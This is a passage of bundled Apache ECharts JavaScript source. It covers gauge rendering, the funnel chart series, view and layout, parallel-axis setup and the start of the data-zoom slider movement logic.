seriesModel, ecModel, api, getColor, posInfo,\n            startAngle, endAngle, clockwise\n        );\n\n        this._renderTitle(\n            seriesModel, ecModel, api, getColor, posInfo\n        );\n        this._renderDetail(\n            seriesModel, ecModel, api, getColor, posInfo\n        );\n    },\n\n    _renderTicks: function (\n        seriesModel, ecModel, api, getColor, posInfo,\n        startAngle, endAngle, clockwise\n    ) {\n        var group = this.group;\n        var cx = posInfo.cx;\n        var cy = posInfo.cy;\n        var r = posInfo.r;\n\n        var minVal = +seriesModel.get('min');\n        var maxVal = +seriesModel.get('max');\n\n        var splitLineModel = seriesModel.getModel('splitLine');\n        var tickModel = seriesModel.getModel('axisTick');\n        var labelModel = seriesModel.getModel('axisLabel');\n\n        var splitNumber = seriesModel.get('splitNumber');\n        var subSplitNumber = tickModel.get('splitNumber');\n\n        var splitLineLen = parsePercent$1(\n            splitLineModel.get('length'), r\n        );\n        var tickLen = parsePercent$1(\n            tickModel.get('length'), r\n        );\n\n        var angle = startAngle;\n        var step = (endAngle - startAngle) / splitNumber;\n        var subStep = step / subSplitNumber;\n\n        var splitLineStyle = splitLineModel.getModel('lineStyle').getLineStyle();\n        var tickLineStyle = tickModel.getModel('lineStyle').getLineStyle();\n\n        for (var i = 0; i <= splitNumber; i++) {\n            var unitX = Math.cos(angle);\n            var unitY = Math.sin(angle);\n            // Split line\n            if (splitLineModel.get('show')) {\n                var splitLine = new Line({\n                    shape: {\n                        x1: unitX * r + cx,\n                        y1: unitY * r + cy,\n                        x2: unitX * (r - splitLineLen) + cx,\n                        y2: unitY * (r - splitLineLen) + cy\n                    },\n                    style: splitLineStyle,\n                    silent: true\n                });\n                if (splitLineStyle.stroke === 'auto') {\n                    splitLine.setStyle({\n                        stroke: getColor(i / splitNumber)\n                    });\n                }\n\n                group.add(splitLine);\n            }\n\n            // Label\n            if (labelModel.get('show')) {\n                var label = formatLabel(\n                    round$1(i / splitNumber * (maxVal - minVal) + minVal),\n                    labelModel.get('formatter')\n                );\n                var distance = labelModel.get('distance');\n                var autoColor = getColor(i / splitNumber);\n\n                group.add(new Text({\n                    style: setTextStyle({}, labelModel, {\n                        text: label,\n                        x: unitX * (r - splitLineLen - distance) + cx,\n                        y: unitY * (r - splitLineLen - distance) + cy,\n                        textVerticalAlign: unitY < -0.4 ? 'top' : (unitY > 0.4 ? 'bottom' : 'middle'),\n                        textAlign: unitX < -0.4 ? 'left' : (unitX > 0.4 ? 'right' : 'center')\n                    }, {autoColor: autoColor}),\n                    silent: true\n                }));\n            }\n\n            // Axis tick\n            if (tickModel.get('show') && i !== splitNumber) {\n                for (var j = 0; j <= subSplitNumber; j++) {\n                    var unitX = Math.cos(angle);\n                    var unitY = Math.sin(angle);\n                    var tickLine = new Line({\n                        shape: {\n                            x1: unitX * r + cx,\n                            y1: unitY * r + cy,\n                            x2: unitX * (r - tickLen) + cx,\n                            y2: unitY * (r - tickLen) + cy\n                        },\n                        silent: true,\n                        style: tickLineStyle\n                    });\n\n                    if (tickLineStyle.stroke === 'auto') {\n                        tickLine.setStyle({\n                            stroke: getColor((i + j / subSplitNumber) / splitNumber)\n                        });\n                    }\n\n                    group.add(tickLine);\n                    angle += subStep;\n                }\n                angle -= subStep;\n            }\n            else {\n                angle += step;\n            }\n        }\n    },\n\n    _renderPointer: function (\n        seriesModel, ecModel, api, getColor, posInfo,\n        startAngle, endAngle, clockwise\n    ) {\n\n        var group = this.group;\n        var oldData = this._data;\n\n        if (!seriesModel.get('pointer.show')) {\n            // Remove old element\n            oldData && oldData.eachItemGraphicEl(function (el) {\n                group.remove(el);\n            });\n            return;\n        }\n\n        var valueExtent = [+seriesModel.get('min'), +seriesModel.get('max')];\n        var angleExtent = [startAngle, endAngle];\n\n        var data = seriesModel.getData();\n        var valueDim = data.mapDimension('value');\n\n        data.diff(oldData)\n            .add(function (idx) {\n                var pointer = new PointerPath({\n                    shape: {\n                        angle: startAngle\n                    }\n                });\n\n                initProps(pointer, {\n                    shape: {\n                        angle: linearMap(data.get(valueDim, idx), valueExtent, angleExtent, true)\n                    }\n                }, seriesModel);\n\n                group.add(pointer);\n                data.setItemGraphicEl(idx, pointer);\n            })\n            .update(function (newIdx, oldIdx) {\n                var pointer = oldData.getItemGraphicEl(oldIdx);\n\n                updateProps(pointer, {\n                    shape: {\n                        angle: linearMap(data.get(valueDim, newIdx), valueExtent, angleExtent, true)\n                    }\n                }, seriesModel);\n\n                group.add(pointer);\n                data.setItemGraphicEl(newIdx, pointer);\n            })\n            .remove(function (idx) {\n                var pointer = oldData.getItemGraphicEl(idx);\n                group.remove(pointer);\n            })\n            .execute();\n\n        data.eachItemGraphicEl(function (pointer, idx) {\n            var itemModel = data.getItemModel(idx);\n            var pointerModel = itemModel.getModel('pointer');\n\n            pointer.setShape({\n                x: posInfo.cx,\n                y: posInfo.cy,\n                width: parsePercent$1(\n                    pointerModel.get('width'), posInfo.r\n                ),\n                r: parsePercent$1(pointerModel.get('length'), posInfo.r)\n            });\n\n            pointer.useStyle(itemModel.getModel('itemStyle').getItemStyle());\n\n            if (pointer.style.fill === 'auto') {\n                pointer.setStyle('fill', getColor(\n                    linearMap(data.get(valueDim, idx), valueExtent, [0, 1], true)\n                ));\n            }\n\n            setHoverStyle(\n                pointer, itemModel.getModel('emphasis.itemStyle').getItemStyle()\n            );\n        });\n\n        this._data = data;\n    },\n\n    _renderTitle: function (\n        seriesModel, ecModel, api, getColor, posInfo\n    ) {\n        var data = seriesModel.getData();\n        var valueDim = data.mapDimension('value');\n        var titleModel = seriesModel.getModel('title');\n        if (titleModel.get('show')) {\n            var offsetCenter = titleModel.get('offsetCenter');\n            var x = posInfo.cx + parsePercent$1(offsetCenter[0], posInfo.r);\n            var y = posInfo.cy + parsePercent$1(offsetCenter[1], posInfo.r);\n\n            var minVal = +seriesModel.get('min');\n            var maxVal = +seriesModel.get('max');\n            var value = seriesModel.getData().get(valueDim, 0);\n            var autoColor = getColor(\n                linearMap(value, [minVal, maxVal], [0, 1], true)\n            );\n\n            this.group.add(new Text({\n                silent: true,\n                style: setTextStyle({}, titleModel, {\n                    x: x,\n                    y: y,\n                    // FIXME First data name ?\n                    text: data.getName(0),\n                    textAlign: 'center',\n                    textVerticalAlign: 'middle'\n                }, {autoColor: autoColor, forceRich: true})\n            }));\n        }\n    },\n\n    _renderDetail: function (\n        seriesModel, ecModel, api, getColor, posInfo\n    ) {\n        var detailModel = seriesModel.getModel('detail');\n        var minVal = +seriesModel.get('min');\n        var maxVal = +seriesModel.get('max');\n        if (detailModel.get('show')) {\n            var offsetCenter = detailModel.get('offsetCenter');\n            var x = posInfo.cx + parsePercent$1(offsetCenter[0], posInfo.r);\n            var y = posInfo.cy + parsePercent$1(offsetCenter[1], posInfo.r);\n            var width = parsePercent$1(detailModel.get('width'), posInfo.r);\n            var height = parsePercent$1(detailModel.get('height'), posInfo.r);\n            var data = seriesModel.getData();\n            var value = data.get(data.mapDimension('value'), 0);\n            var autoColor = getColor(\n                linearMap(value, [minVal, maxVal], [0, 1], true)\n            );\n\n            this.group.add(new Text({\n                silent: true,\n                style: setTextStyle({}, detailModel, {\n                    x: x,\n                    y: y,\n                    text: formatLabel(\n                        // FIXME First data name ?\n                        value, detailModel.get('formatter')\n                    ),\n                    textWidth: isNaN(width) ? null : width,\n                    textHeight: isNaN(height) ? null : height,\n                    textAlign: 'center',\n                    textVerticalAlign: 'middle'\n                }, {autoColor: autoColor, forceRich: true})\n            }));\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar FunnelSeries = extendSeriesModel({\n\n    type: 'series.funnel',\n\n    init: function (option) {\n        FunnelSeries.superApply(this, 'init', arguments);\n\n        // Enable legend selection for each data item\n        // Use a function instead of direct access because data reference may changed\n        this.legendVisualProvider = new LegendVisualProvider(\n            bind(this.getData, this), bind(this.getRawData, this)\n        );\n        // Extend labelLine emphasis\n        this._defaultLabelLine(option);\n    },\n\n    getInitialData: function (option, ecModel) {\n        return createListSimply(this, {\n            coordDimensions: ['value'],\n            encodeDefaulter: curry(makeSeriesEncodeForNameBased, this)\n        });\n    },\n\n    _defaultLabelLine: function (option) {\n        // Extend labelLine emphasis\n        defaultEmphasis(option, 'labelLine', ['show']);\n\n        var labelLineNormalOpt = option.labelLine;\n        var labelLineEmphasisOpt = option.emphasis.labelLine;\n        // Not show label line if `label.normal.show = false`\n        labelLineNormalOpt.show = labelLineNormalOpt.show\n            && option.label.show;\n        labelLineEmphasisOpt.show = labelLineEmphasisOpt.show\n            && option.emphasis.label.show;\n    },\n\n    // Overwrite\n    getDataParams: function (dataIndex) {\n        var data = this.getData();\n        var params = FunnelSeries.superCall(this, 'getDataParams', dataIndex);\n        var valueDim = data.mapDimension('value');\n        var sum = data.getSum(valueDim);\n        // Percent is 0 if sum is 0\n        params.percent = !sum ? 0 : +(data.get(valueDim, dataIndex) / sum * 100).toFixed(2);\n\n        params.$vars.push('percent');\n        return params;\n    },\n\n    defaultOption: {\n        zlevel: 0,                  // 一级层叠\n        z: 2,                       // 二级层叠\n        legendHoverLink: true,\n        left: 80,\n        top: 60,\n        right: 80,\n        bottom: 60,\n        // width: {totalWidth} - left - right,\n        // height: {totalHeight} - top - bottom,\n\n        // 默认取数据最小最大值\n        // min: 0,\n        // max: 100,\n        minSize: '0%',\n        maxSize: '100%',\n        sort: 'descending', // 'ascending', 'descending'\n        gap: 0,\n        funnelAlign: 'center',\n        label: {\n            show: true,\n            position: 'outer'\n            // formatter: 标签文本格式器，同Tooltip.formatter，不支持异步回调\n        },\n        labelLine: {\n            show: true,\n            length: 20,\n            lineStyle: {\n                // color: 各异,\n                width: 1,\n                type: 'solid'\n            }\n        },\n        itemStyle: {\n            // color: 各异,\n            borderColor: '#fff',\n            borderWidth: 1\n        },\n        emphasis: {\n            label: {\n                show: true\n            }\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Piece of pie including Sector, Label, LabelLine\n * @constructor\n * @extends {module:zrender/graphic/Group}\n */\nfunction FunnelPiece(data, idx) {\n\n    Group.call(this);\n\n    var polygon = new Polygon();\n    var labelLine = new Polyline();\n    var text = new Text();\n    this.add(polygon);\n    this.add(labelLine);\n    this.add(text);\n\n    this.highDownOnUpdate = function (fromState, toState) {\n        if (toState === 'emphasis') {\n            labelLine.ignore = labelLine.hoverIgnore;\n            text.ignore = text.hoverIgnore;\n        }\n        else {\n            labelLine.ignore = labelLine.normalIgnore;\n            text.ignore = text.normalIgnore;\n        }\n    };\n\n    this.updateData(data, idx, true);\n}\n\nvar funnelPieceProto = FunnelPiece.prototype;\n\nvar opacityAccessPath = ['itemStyle', 'opacity'];\nfunnelPieceProto.updateData = function (data, idx, firstCreate) {\n\n    var polygon = this.childAt(0);\n\n    var seriesModel = data.hostModel;\n    var itemModel = data.getItemModel(idx);\n    var layout = data.getItemLayout(idx);\n    var opacity = data.getItemModel(idx).get(opacityAccessPath);\n    opacity = opacity == null ? 1 : opacity;\n\n    // Reset style\n    polygon.useStyle({});\n\n    if (firstCreate) {\n        polygon.setShape({\n            points: layout.points\n        });\n        polygon.setStyle({opacity: 0});\n        initProps(polygon, {\n            style: {\n                opacity: opacity\n            }\n        }, seriesModel, idx);\n    }\n    else {\n        updateProps(polygon, {\n            style: {\n                opacity: opacity\n            },\n            shape: {\n                points: layout.points\n            }\n        }, seriesModel, idx);\n    }\n\n    // Update common style\n    var itemStyleModel = itemModel.getModel('itemStyle');\n    var visualColor = data.getItemVisual(idx, 'color');\n\n    polygon.setStyle(\n        defaults(\n            {\n                lineJoin: 'round',\n                fill: visualColor\n            },\n            itemStyleModel.getItemStyle(['opacity'])\n        )\n    );\n    polygon.hoverStyle = itemStyleModel.getModel('emphasis').getItemStyle();\n\n    this._updateLabel(data, idx);\n\n    setHoverStyle(this);\n};\n\nfunnelPieceProto._updateLabel = function (data, idx) {\n\n    var labelLine = this.childAt(1);\n    var labelText = this.childAt(2);\n\n    var seriesModel = data.hostModel;\n    var itemModel = data.getItemModel(idx);\n    var layout = data.getItemLayout(idx);\n    var labelLayout = layout.label;\n    var visualColor = data.getItemVisual(idx, 'color');\n\n    updateProps(labelLine, {\n        shape: {\n            points: labelLayout.linePoints || labelLayout.linePoints\n        }\n    }, seriesModel, idx);\n\n    updateProps(labelText, {\n        style: {\n            x: labelLayout.x,\n            y: labelLayout.y\n        }\n    }, seriesModel, idx);\n    labelText.attr({\n        rotation: labelLayout.rotation,\n        origin: [labelLayout.x, labelLayout.y],\n        z2: 10\n    });\n\n    var labelModel = itemModel.getModel('label');\n    var labelHoverModel = itemModel.getModel('emphasis.label');\n    var labelLineModel = itemModel.getModel('labelLine');\n    var labelLineHoverModel = itemModel.getModel('emphasis.labelLine');\n    var visualColor = data.getItemVisual(idx, 'color');\n\n    setLabelStyle(\n        labelText.style, labelText.hoverStyle = {}, labelModel, labelHoverModel,\n        {\n            labelFetcher: data.hostModel,\n            labelDataIndex: idx,\n            defaultText: data.getName(idx),\n            autoColor: visualColor,\n            useInsideStyle: !!labelLayout.inside\n        },\n        {\n            textAlign: labelLayout.textAlign,\n            textVerticalAlign: labelLayout.verticalAlign\n        }\n    );\n\n    labelText.ignore = labelText.normalIgnore = !labelModel.get('show');\n    labelText.hoverIgnore = !labelHoverModel.get('show');\n\n    labelLine.ignore = labelLine.normalIgnore = !labelLineModel.get('show');\n    labelLine.hoverIgnore = !labelLineHoverModel.get('show');\n\n    // Default use item visual color\n    labelLine.setStyle({\n        stroke: visualColor\n    });\n    labelLine.setStyle(labelLineModel.getModel('lineStyle').getLineStyle());\n\n    labelLine.hoverStyle = labelLineHoverModel.getModel('lineStyle').getLineStyle();\n};\n\ninherits(FunnelPiece, Group);\n\n\nvar FunnelView = Chart.extend({\n\n    type: 'funnel',\n\n    render: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n        var oldData = this._data;\n\n        var group = this.group;\n\n        data.diff(oldData)\n            .add(function (idx) {\n                var funnelPiece = new FunnelPiece(data, idx);\n\n                data.setItemGraphicEl(idx, funnelPiece);\n\n                group.add(funnelPiece);\n            })\n            .update(function (newIdx, oldIdx) {\n                var piePiece = oldData.getItemGraphicEl(oldIdx);\n\n                piePiece.updateData(data, newIdx);\n\n                group.add(piePiece);\n                data.setItemGraphicEl(newIdx, piePiece);\n            })\n            .remove(function (idx) {\n                var piePiece = oldData.getItemGraphicEl(idx);\n                group.remove(piePiece);\n            })\n            .execute();\n\n        this._data = data;\n    },\n\n    remove: function () {\n        this.group.removeAll();\n        this._data = null;\n    },\n\n    dispose: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction getViewRect$3(seriesModel, api) {\n    return getLayoutRect(\n        seriesModel.getBoxLayoutParams(), {\n            width: api.getWidth(),\n            height: api.getHeight()\n        }\n    );\n}\n\nfunction getSortedIndices(data, sort) {\n    var valueDim = data.mapDimension('value');\n    var valueArr = data.mapArray(valueDim, function (val) {\n        return val;\n    });\n    var indices = [];\n    var isAscending = sort === 'ascending';\n    for (var i = 0, len = data.count(); i < len; i++) {\n        indices[i] = i;\n    }\n\n    // Add custom sortable function & none sortable opetion by \"options.sort\"\n    if (typeof sort === 'function') {\n        indices.sort(sort);\n    }\n    else if (sort !== 'none') {\n        indices.sort(function (a, b) {\n            return isAscending ? valueArr[a] - valueArr[b] : valueArr[b] - valueArr[a];\n        });\n    }\n    return indices;\n}\n\nfunction labelLayout$1(data) {\n    data.each(function (idx) {\n        var itemModel = data.getItemModel(idx);\n        var labelModel = itemModel.getModel('label');\n        var labelPosition = labelModel.get('position');\n\n        var labelLineModel = itemModel.getModel('labelLine');\n\n        var layout = data.getItemLayout(idx);\n        var points = layout.points;\n\n        var isLabelInside = labelPosition === 'inner'\n            || labelPosition === 'inside' || labelPosition === 'center'\n            || labelPosition === 'insideLeft' || labelPosition === 'insideRight';\n\n        var textAlign;\n        var textX;\n        var textY;\n        var linePoints;\n\n        if (isLabelInside) {\n            if (labelPosition === 'insideLeft') {\n                textX = (points[0][0] + points[3][0]) / 2 + 5;\n                textY = (points[0][1] + points[3][1]) / 2;\n                textAlign = 'left';\n            }\n            else if (labelPosition === 'insideRight') {\n                textX = (points[1][0] + points[2][0]) / 2 - 5;\n                textY = (points[1][1] + points[2][1]) / 2;\n                textAlign = 'right';\n            }\n            else {\n                textX = (points[0][0] + points[1][0] + points[2][0] + points[3][0]) / 4;\n                textY = (points[0][1] + points[1][1] + points[2][1] + points[3][1]) / 4;\n                textAlign = 'center';\n            }\n            linePoints = [\n                [textX, textY], [textX, textY]\n            ];\n        }\n        else {\n            var x1;\n            var y1;\n            var x2;\n            var labelLineLen = labelLineModel.get('length');\n            if (labelPosition === 'left') {\n                // Left side\n                x1 = (points[3][0] + points[0][0]) / 2;\n                y1 = (points[3][1] + points[0][1]) / 2;\n                x2 = x1 - labelLineLen;\n                textX = x2 - 5;\n                textAlign = 'right';\n            }\n            else if (labelPosition === 'right') {\n                // Right side\n                x1 = (points[1][0] + points[2][0]) / 2;\n                y1 = (points[1][1] + points[2][1]) / 2;\n                x2 = x1 + labelLineLen;\n                textX = x2 + 5;\n                textAlign = 'left';\n            }\n            else if (labelPosition === 'rightTop') {\n                // RightTop side\n                x1 = points[1][0];\n                y1 = points[1][1];\n                x2 = x1 + labelLineLen;\n                textX = x2 + 5;\n                textAlign = 'top';\n            }\n            else if (labelPosition === 'rightBottom') {\n                // RightBottom side\n                x1 = points[2][0];\n                y1 = points[2][1];\n                x2 = x1 + labelLineLen;\n                textX = x2 + 5;\n                textAlign = 'bottom';\n            }\n            else if (labelPosition === 'leftTop') {\n                // LeftTop side\n                x1 = points[0][0];\n                y1 = points[1][1];\n                x2 = x1 - labelLineLen;\n                textX = x2 - 5;\n                textAlign = 'right';\n            }\n            else if (labelPosition === 'leftBottom') {\n                // LeftBottom side\n                x1 = points[3][0];\n                y1 = points[2][1];\n                x2 = x1 - labelLineLen;\n                textX = x2 - 5;\n                textAlign = 'right';\n            }\n            else {\n                // Right side\n                x1 = (points[1][0] + points[2][0]) / 2;\n                y1 = (points[1][1] + points[2][1]) / 2;\n                x2 = x1 + labelLineLen;\n                textX = x2 + 5;\n                textAlign = 'left';\n            }\n            var y2 = y1;\n\n            linePoints = [[x1, y1], [x2, y2]];\n            textY = y2;\n        }\n\n        layout.label = {\n            linePoints: linePoints,\n            x: textX,\n            y: textY,\n            verticalAlign: 'middle',\n            textAlign: textAlign,\n            inside: isLabelInside\n        };\n    });\n}\n\nvar funnelLayout = function (ecModel, api, payload) {\n    ecModel.eachSeriesByType('funnel', function (seriesModel) {\n        var data = seriesModel.getData();\n        var valueDim = data.mapDimension('value');\n        var sort = seriesModel.get('sort');\n        var viewRect = getViewRect$3(seriesModel, api);\n        var indices = getSortedIndices(data, sort);\n\n        var sizeExtent = [\n            parsePercent$1(seriesModel.get('minSize'), viewRect.width),\n            parsePercent$1(seriesModel.get('maxSize'), viewRect.width)\n        ];\n        var dataExtent = data.getDataExtent(valueDim);\n        var min = seriesModel.get('min');\n        var max = seriesModel.get('max');\n        if (min == null) {\n            min = Math.min(dataExtent[0], 0);\n        }\n        if (max == null) {\n            max = dataExtent[1];\n        }\n\n        var funnelAlign = seriesModel.get('funnelAlign');\n        var gap = seriesModel.get('gap');\n        var itemHeight = (viewRect.height - gap * (data.count() - 1)) / data.count();\n\n        var y = viewRect.y;\n\n        var getLinePoints = function (idx, offY) {\n            // End point index is data.count() and we assign it 0\n            var val = data.get(valueDim, idx) || 0;\n            var itemWidth = linearMap(val, [min, max], sizeExtent, true);\n            var x0;\n            switch (funnelAlign) {\n                case 'left':\n                    x0 = viewRect.x;\n                    break;\n                case 'center':\n                    x0 = viewRect.x + (viewRect.width - itemWidth) / 2;\n                    break;\n                case 'right':\n                    x0 = viewRect.x + viewRect.width - itemWidth;\n                    break;\n            }\n            return [\n                [x0, offY],\n                [x0 + itemWidth, offY]\n            ];\n        };\n\n        if (sort === 'ascending') {\n            // From bottom to top\n            itemHeight = -itemHeight;\n            gap = -gap;\n            y += viewRect.height;\n            indices = indices.reverse();\n        }\n\n        for (var i = 0; i < indices.length; i++) {\n            var idx = indices[i];\n            var nextIdx = indices[i + 1];\n\n            var itemModel = data.getItemModel(idx);\n            var height = itemModel.get('itemStyle.height');\n            if (height == null) {\n                height = itemHeight;\n            }\n            else {\n                height = parsePercent$1(height, viewRect.height);\n                if (sort === 'ascending') {\n                    height = -height;\n                }\n            }\n\n            var start = getLinePoints(idx, y);\n            var end = getLinePoints(nextIdx, y + height);\n\n            y += height + gap;\n\n            data.setItemLayout(idx, {\n                points: start.concat(end.slice().reverse())\n            });\n        }\n\n        labelLayout$1(data);\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(dataColor('funnel'));\nregisterLayout(funnelLayout);\nregisterProcessor(dataFilter('funnel'));\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar parallelPreprocessor = function (option) {\n    createParallelIfNeeded(option);\n    mergeAxisOptionFromParallel(option);\n};\n\n/**\n * Create a parallel coordinate if not exists.\n * @inner\n */\nfunction createParallelIfNeeded(option) {\n    if (option.parallel) {\n        return;\n    }\n\n    var hasParallelSeries = false;\n\n    each$1(option.series, function (seriesOpt) {\n        if (seriesOpt && seriesOpt.type === 'parallel') {\n            hasParallelSeries = true;\n        }\n    });\n\n    if (hasParallelSeries) {\n        option.parallel = [{}];\n    }\n}\n\n/**\n * Merge aixs definition from parallel option (if exists) to axis option.\n * @inner\n */\nfunction mergeAxisOptionFromParallel(option) {\n    var axes = normalizeToArray(option.parallelAxis);\n\n    each$1(axes, function (axisOption) {\n        if (!isObject$1(axisOption)) {\n            return;\n        }\n\n        var parallelIndex = axisOption.parallelIndex || 0;\n        var parallelOption = normalizeToArray(option.parallel)[parallelIndex];\n\n        if (parallelOption && parallelOption.parallelAxisDefault) {\n            merge(axisOption, parallelOption.parallelAxisDefault, false);\n        }\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @constructor module:echarts/coord/parallel/ParallelAxis\n * @extends {module:echarts/coord/Axis}\n * @param {string} dim\n * @param {*} scale\n * @param {Array.<number>} coordExtent\n * @param {string} axisType\n */\nvar ParallelAxis = function (dim, scale, coordExtent, axisType, axisIndex) {\n\n    Axis.call(this, dim, scale, coordExtent);\n\n    /**\n     * Axis type\n     *  - 'category'\n     *  - 'value'\n     *  - 'time'\n     *  - 'log'\n     * @type {string}\n     */\n    this.type = axisType || 'value';\n\n    /**\n     * @type {number}\n     * @readOnly\n     */\n    this.axisIndex = axisIndex;\n};\n\nParallelAxis.prototype = {\n\n    constructor: ParallelAxis,\n\n    /**\n     * Axis model\n     * @param {module:echarts/coord/parallel/AxisModel}\n     */\n    model: null,\n\n    /**\n     * @override\n     */\n    isHorizontal: function () {\n        return this.coordinateSystem.getModel().get('layout') !== 'horizontal';\n    }\n\n};\n\ninherits(ParallelAxis, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Calculate slider move result.\n * Usage:\n * (1) If both handle0 and handle1 are needed to be moved, set minSpan the same as\n * maxSpan and the same as `Math.abs(handleEnd[1] - handleEnds[0])`.\n * (2) If handle0 is forbidden to cross handle1, set minSpan as `0`.\n *\n * @param {number} delta Move length.\n * @param {Array.<number>} handleEnds handleEnds[0] can be bigger then handleEnds[1].\n *              handleEnds will be modified in this method.\n * @param {Array.<number>} extent handleEnds is restricted by extent.\n *              extent[0] should less or equals than extent[1].\n * @param {number|string} handleIndex Can be 'all', means that both move the two handleEnds.\n * @param {number} [minSpan] The range of dataZoom can not be smaller than that.\n *              If not set, handle0 and cross handle1. If set as a non-negative\n *              number (including `0`), handles will push each other when reaching\n *              the minSpan.\n * @param {number} [maxSpan] The range of dataZoom can not be larger than that.\n * @return {Array.<number>} The input handleEnds.\n */\nvar sliderMove = function (delta, handleEnds, extent, handleIndex, minSpan, maxSpan) {\n\n    delta = delta || 0;\n\n    var extentSpan = extent[1] - extent[0];\n\n    // Notice maxSpan and minSpan can be null/undefined.\n    if (minSpan != null) {\n        minSpan = restrict$1(minSpan, [0, extentSpan]);\n    }\n    if (maxSpan != null) {\n        maxSpan = Math.max(maxSpan, minSpan != null ? minSpan : 0);\n    }\n    if (handleIndex === 'all') {\n        var handleSpan = Math.abs(handleEnds[1] - handleEnds[0]);\n        handleSpan = restrict$1(handleSpan, [0, extentSpan]);\n        minSpan = maxSpan = restrict$1(handleSpan, [minSpan, maxSpan]);\n        handleIndex = 0;\n    }\n\n    handleEnds[0] = restrict$1(handleEnds[0], extent);\n    handleEnds[1] = restrict$1(handleEnds[1], extent);\n\n    var originalDistSign = getSpanSign(handleEnds, handleIndex);\n\n    handleEnds[handleIndex] += delta;\n\n    // Restrict in extent.\n    var extentMinSpan = minSpan || 0;\n    var realExtent = extent.slice();\n    originalDistSign.sign < 0 ? (realExtent[0] += extentMinSpan) : (realExtent[1] -= extentMinSpan);\n    handleEnds[handleIndex] = restrict$1(handleEnds[handleIndex], realExtent);\n\n    // Expand span.\n    var currDistSign = getSpanSign(handleEnds, handleIndex);\n    if (minSpan != null && (\n        currDistSign.sign !== originalDistSign.sign || currDistSign.span < minSpan\n    )) 